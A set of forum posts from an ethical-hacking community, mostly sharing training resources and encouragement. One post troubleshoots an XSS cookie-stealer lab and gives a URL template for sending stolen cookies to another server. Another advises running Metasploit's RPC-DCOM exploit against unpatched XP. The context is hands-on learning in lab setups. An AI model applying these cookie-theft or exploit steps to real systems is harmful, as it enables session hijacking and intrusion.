Another great resource to get started with exploit, assembler & co is opensecuritytraining http://opensecuritytraining.info/Training.html

I found them a couple of days ago and already did their Intro x86 class, which I really liked a lot.

Haven't seen them mentioned anywhere here on EHN yet, so I thought I share the link for anybody who wants to get started with assembly, exploits, rootkits and other fun stuff.

Their youtube channel is located here: http://www.youtube.com/user/OpenSecurityTraining/videos?flow=grid&view=1

Happy hacking!

+1 to what unicityd wrote.

@ZeroOne I agree with you on that. But as unicityd wrote ... it's not the point to have a working exploit with which you can hack a gazillion of machines, but to learn how Metasploit as a tool functions. And here I think for learning purposes it's totally fine to follow along an "old" exploit just to see what options there are, how to use them ...and so on... So, see it as a "walk before you can run" thing ;o).

One thought on "who on earth will be using XP with no SPs", though. Think about all the people who run a stolen/hacked copy of XP (or Vista or Win7) on their machines with update services disabled in panic of not getting caught ... I heared this can be quite common in Third World countries. I don't know any statistics to show this though... it was just a thought...so please don't get me on this ;o)...

But you are probably right, in times of vista, win7 an unpatched copy of XP might be rare... (at least I have no personal experience about that...)

@ cyber.spirit
I think the patch was originally after SP1(or2) and then later added to the SPs... that's why we still see Win 2003 in target range in Metasploit (was that your question?!?)...not sure about this though...

I really like the videos on securitytube. I am quite a fan of the "visual learning approach"....since I can better remember things when someone has shown me how to do it.

Anyways, have fun with the video series!

Hi cyber.spirit

I guess you go through Viveks Videos on Metasploit, right?!

As far as I know the RPC-dcom exploit has been patched in SP1 or 2 ...not 100% sure at the moment.

However, the exploit will definately work with an unpatched Win XP - so no SPs (I tested that). Also make sure to disable any (Windows-) firewall.

Hi wlandymore,

ok this might sound odd - and it's just a thought ...so don't get me wrong, but do you start your html file in a "server-context" meaning is it in your htdocs or do you just open it on your harddrive?

Since if you do the second it won't work or at least you cannot read the cookies from localhost ...(Happend to me too...an alertbox on the page worked however php script could't read cookies...).

For "debuggin" try to throw both scripts in your htdocs ... and look if the php script gets the cookies...

Don't know if this helps, was just a thought....

Cheers,
-gromic

Hi wlandymore, hi ajohnson

The following code (cookie_site.html and cookiestealer.php  ) should work (Seems that you just missed a / before your stealer script redirect in your html page).

I tested it via a xampp setup and it worked.

Just throw both of the files into your XAMPP htdocs.

file: cookie_site.html

file: cookiestealer.php

Note:

• So far, page and stealer.php run on the same server (I know...not intended). When you move your stealer.php to another server you have to adjust your path i.e. “http://<Server IP >/cookiestealer.php?cookie=” … and so on..
• One more tip: When debugging your scripts make sure you delete your browsers cache each time... very often I changed something but my browser (Chrome) showed me still the old results 
• cross domain issues should't be a problem since as far as I understood the idea was to place the "stealer script" on a site which is vuln to XSS and steal the cookies related to THIS site, right? If you want to read cookies of another domain you run into "same orgin" issues..
  

Hope this helps and works for you.

Hi Jamie,
 
I am really sorry to hear that with your job. I second what everybody has written so far.
From your posts here on EH-net as well as your site you seem really passionate about ITsec…So DON’T give up!


Since I am still in my masters and job hunting for me won’t start before august, this is the only “real advice” I can give you: “DON’T give up, if IT-Sec is really your passion!!”

If I were in your situation, though, I would first ask your employer for a talk to elaborate on the exact reasons why they have fired you. This might hurt, but will give you valuable information on what you can improve the next time.

Second I would right away start to apply for new pentesting jobs. Don’t let the “feeling of being not good enough” let you down or discourage you and get right into the game again!
And only if this won’t work out for whatever reasons “too less job experience”, “too young”….blah blah… try to get a job as admin or what else…to build a solid foundation (always with the goal to learn something new...so no "brain death" jobs). 
And never forget to focus on your goal or “dream job”!

I wish you good luck and all the best!! And again: Don’t give up!

I did that today, too. I really appreciate the contents and already learned tons out of it.

I think it's a good thing to support, even though it's free  (as in
freedom not freebeer  ), just to show the appreciation for the effort!

Hi guys,

Just found out today, that the materials for the SMFE at security tube is online.
It is not packaged in a DVD but you can download it here:
http://www.securitytube.net/groups?operation=view&groupId=10

Thx a lot Vivek for this great work!

It's just amazing how much effort he puts into these videos.

I watched the Megaprimer Metasploit (the SMFE ones are slightly different from first glance) and they are just great for getting into Metasploit.

I definitely will think of getting the SMFE in the near future but my budget is too low at the moment, since I just entered elearnsecurity.

Greetings
-gromic

You might also find w3af interesting:
http://w3af.sourceforge.net/

It is also coded in Python.

Awesome! Can't wait for the DVD!

thx for the update lorddicranius

Welcome blue_hat,

With programming languages it is always a matter of "the right tool for the right job".  So as cd1zz mentioned it always depends on your goals.

Nevertheless I think it is always good to have various programming languages on your "tool belt" since very often they help looking at problems in different ways. Because when holding only the same hammer in your hand ...every problem somehow always looks like a nail... (and maybe not like a screw...) 

Again Welcome to EH-Net!

Hi CeemGee and Welcome on EH-Network! Looking forward to read more from you in the future

Hi Jamie,

Love your new design!! (have also been a visitor of your site when it had the old one)

Wow, I am jealous , since setting up a page/blog is also on my toDo list for quite some time now (the domain is already set)... and your site is just what I had imagined  .

Maybe a bit off topic but I found out that you have removed the Syngress XSS Attack book from your "future" reading list ( If I can remember it right). 
Any reasons for this? Since I bought it the other week and think it is quite an interesting read (read the first 100 pages so far). 
Reading it always makes me shiver of what's all possible with Xss...
Anyways...getting back to the topic...

Great page!  Good luck with it!

The Wifi-Sec iso file is 4,23 GB big ^^ Don't know if they sell/ship it.

A site for a great overview of diffrent vulnerable systems/apps for a pentest lab is:
http://g0tmi1k.blogspot.com/2011/03/vulnerable-by-design.html